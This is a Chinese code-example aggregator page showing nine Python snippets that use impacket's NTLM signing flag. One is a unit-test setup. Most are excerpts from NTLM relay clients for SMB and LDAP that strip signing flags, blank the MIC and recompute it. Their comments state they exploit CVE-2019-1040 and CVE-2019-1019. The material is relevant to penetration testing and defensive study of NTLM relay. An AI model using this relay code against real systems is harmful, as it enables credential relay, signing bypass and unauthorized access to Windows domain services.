本文整理汇总了Python中impacket.ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN属性的典型用法代码示例。如果您正苦于以下问题:Python ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN属性的具体用法?Python ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN怎么用?Python ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN使用的例子?那么恭喜您, 这里精选的属性代码示例或许可以为您提供帮助。您也可以进一步了解该属性所在类impacket.ntlm的用法示例。
在下文中一共展示了ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN属性的9个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: setUp
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_ALWAYS_SIGN [as 别名]
def setUp(self):
# Turn test case mode on
ntlm.TEST_CASE = True
self.user = "User"
self.domain = "Domain"
self.password = "Password"
self.serverName = "Server"
self.workstationName = "COMPUTER"
self.randomSessionKey = b("U"*16)
self.time = b('\x00'*8)
self.clientChallenge = b("\xaa"*8)
self.serverChallenge = b("\x01\x23\x45\x67\x89\xab\xcd\xef")
self.flags = ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH | ntlm.NTLMSSP_NEGOTIATE_56 | ntlm.NTLMSSP_NEGOTIATE_128 | ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_TARGET_TYPE_SERVER | ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN | ntlm.NTLMSSP_NEGOTIATE_NTLM | ntlm.NTLMSSP_NEGOTIATE_SEAL | ntlm.NTLMSSP_NEGOTIATE_SIGN | ntlm.NTLM_NEGOTIATE_OEM | ntlm.NTLMSSP_NEGOTIATE_UNICODE
self.seqNum = 0
self.nonce = b('\x00'*16)
self.plaintext = 'Plaintext'.encode('utf-16le')
print("## BEFORE RUNNING THESE TESTS")
print("Don't forget to set up aTime = '\\x00'*8 in computeResponseNTLMv2 otherwise the results won't be right. ")
print("Look for that in ntlm.py and uncomment the lines, comment the other ones and don't forget to revert everything back whenever finished testing")
print("Flags")
hexdump(struct.pack('<L',self.flags)) 示例2: do_ntlm_negotiate
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_ALWAYS_SIGN [as 别名]
def do_ntlm_negotiate(self,token):
if self.target[0] == 'SMB':
try:
self.client = SMBRelayClient(self.target[1], extended_security = True)
self.client.setDomainAccount(self.server.config.machineAccount, self.server.config.machineHashes, self.server.config.domainIp)
self.client.set_timeout(10)
negotiate = ntlm.NTLMAuthNegotiate()
negotiate.fromString(token)
#Remove the signing flag
negotiate['flags'] ^= ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN
clientChallengeMessage = self.client.sendNegotiate(negotiate.getData())
except Exception, e:
logging.error("Connection against target %s FAILED" % self.target[1])
logging.error(str(e))
return False 示例3: sendNegotiate
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_ALWAYS_SIGN [as 别名]
def sendNegotiate(self, negotiateMessage):
negoMessage = NTLMAuthNegotiate()
negoMessage.fromString(negotiateMessage)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
negotiateMessage = negoMessage.getData()
challenge = NTLMAuthChallenge()
if self.session.getDialect() == SMB_DIALECT:
challenge.fromString(self.sendNegotiatev1(negotiateMessage))
else:
challenge.fromString(self.sendNegotiatev2(negotiateMessage))
self.negotiateMessage = negotiateMessage
self.challengeMessage = challenge.getData()
# Store the Challenge in our session data dict. It will be used by the SMB Proxy
self.sessionData['CHALLENGE_MESSAGE'] = challenge
self.serverChallenge = challenge['challenge']
return challenge 示例4: sendNegotiate
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_ALWAYS_SIGN [as 别名]
def sendNegotiate(self, negotiateMessage):
negoMessage = NTLMAuthNegotiate()
negoMessage.fromString(negotiateMessage)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
negotiateMessage = negoMessage.getData()
challenge = NTLMAuthChallenge()
if self.session.getDialect() == SMB_DIALECT:
challenge.fromString(self.sendNegotiatev1(negotiateMessage))
else:
challenge.fromString(self.sendNegotiatev2(negotiateMessage))
# Store the Challenge in our session data dict. It will be used by the SMB Proxy
self.sessionData['CHALLENGE_MESSAGE'] = challenge
return challenge 示例5: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_ALWAYS_SIGN [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
return token, errorCode 示例6: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_ALWAYS_SIGN [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
signingKey = None
if self.serverConfig.remove_target:
# Trying to exploit CVE-2019-1019
# Discovery and Implementation by @simakov_marina and @YaronZi
respToken2 = SPNEGO_NegTokenResp(authData)
authenticateMessageBlob = respToken2['ResponseToken']
errorCode, signingKey = self.netlogonSessionKey(authData)
# Recalculate MIC
res = NTLMAuthChallengeResponse()
res.fromString(authenticateMessageBlob)
newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:]
relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
authData = respToken2.getData()
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
if signingKey:
logging.info("Enabling session signing")
self.session._SMBConnection.set_session_key(signingKey)
return token, errorCode 示例7: sendNegotiate
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_ALWAYS_SIGN [as 别名]
def sendNegotiate(self, negotiateMessage):
# Remove the message signing flag
# For SMB->LDAP this is required otherwise it triggers LDAP signing
# Note that this code is commented out because changing flags breaks the signature
# unless the client uses a non-standard implementation of NTLM
negoMessage = NTLMAuthNegotiate()
negoMessage.fromString(negotiateMessage)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
self.negotiateMessage = negoMessage.getData()
# Warn if the relayed target requests signing, which will break our attack
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
LOG.warning('The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)')
with self.session.connection_lock:
if not self.session.sasl_in_progress:
self.session.sasl_in_progress = True
request = bind.bind_operation(self.session.version, 'SICILY_PACKAGE_DISCOVERY')
response = self.session.post_send_single_response(self.session.send('bindRequest', request, None))
result = response[0]
try:
sicily_packages = result['server_creds'].decode('ascii').split(';')
except KeyError:
raise LDAPRelayClientException('Could not discover authentication methods, server replied: %s' % result)
if 'NTLM' in sicily_packages: # NTLM available on server
request = bind.bind_operation(self.session.version, 'SICILY_NEGOTIATE_NTLM', self)
response = self.session.post_send_single_response(self.session.send('bindRequest', request, None))
result = response[0]
if result['result'] == RESULT_SUCCESS:
challenge = NTLMAuthChallenge()
challenge.fromString(result['server_creds'])
return challenge
else:
raise LDAPRelayClientException('Server did not offer NTLM authentication!')
#This is a fake function for ldap3 which wants an NTLM client with specific methods 示例8: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_ALWAYS_SIGN [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
if unpack('B', authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
token = respToken2['ResponseToken']
else:
token = authenticateMessageBlob
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(token)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
token = authMessage.getData()
with self.session.connection_lock:
self.authenticateMessageBlob = token
request = bind.bind_operation(self.session.version, 'SICILY_RESPONSE_NTLM', self, None)
response = self.session.post_send_single_response(self.session.send('bindRequest', request, None))
result = response[0]
self.session.sasl_in_progress = False
if result['result'] == RESULT_SUCCESS:
self.session.bound = True
self.session.refresh_server_info()
return None, STATUS_SUCCESS
else:
if result['result'] == RESULT_STRONGER_AUTH_REQUIRED and self.PLUGIN_NAME != 'LDAPS':
raise LDAPRelayClientException('Server rejected authentication because LDAP signing is enabled. Try connecting with TLS enabled (specify target as ldaps://hostname )')
return None, STATUS_ACCESS_DENIED
#This is a fake function for ldap3 which wants an NTLM client with specific methods 示例9: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_ALWAYS_SIGN [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
signingKey = None
if self.serverConfig.remove_target:
# Trying to exploit CVE-2019-1019
# Discovery and Implementation by @simakov_marina
respToken2 = SPNEGO_NegTokenResp(authData)
authenticateMessageBlob = respToken2['ResponseToken']
errorCode, signingKey = self.netlogonSessionKey(authData)
# Recalculate MIC
res = NTLMAuthChallengeResponse()
res.fromString(authenticateMessageBlob)
newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:]
relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
authData = respToken2.getData()
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
if signingKey:
logging.info("Enabling session signing")
self.session._SMBConnection.set_session_key(signingKey)
return token, errorCode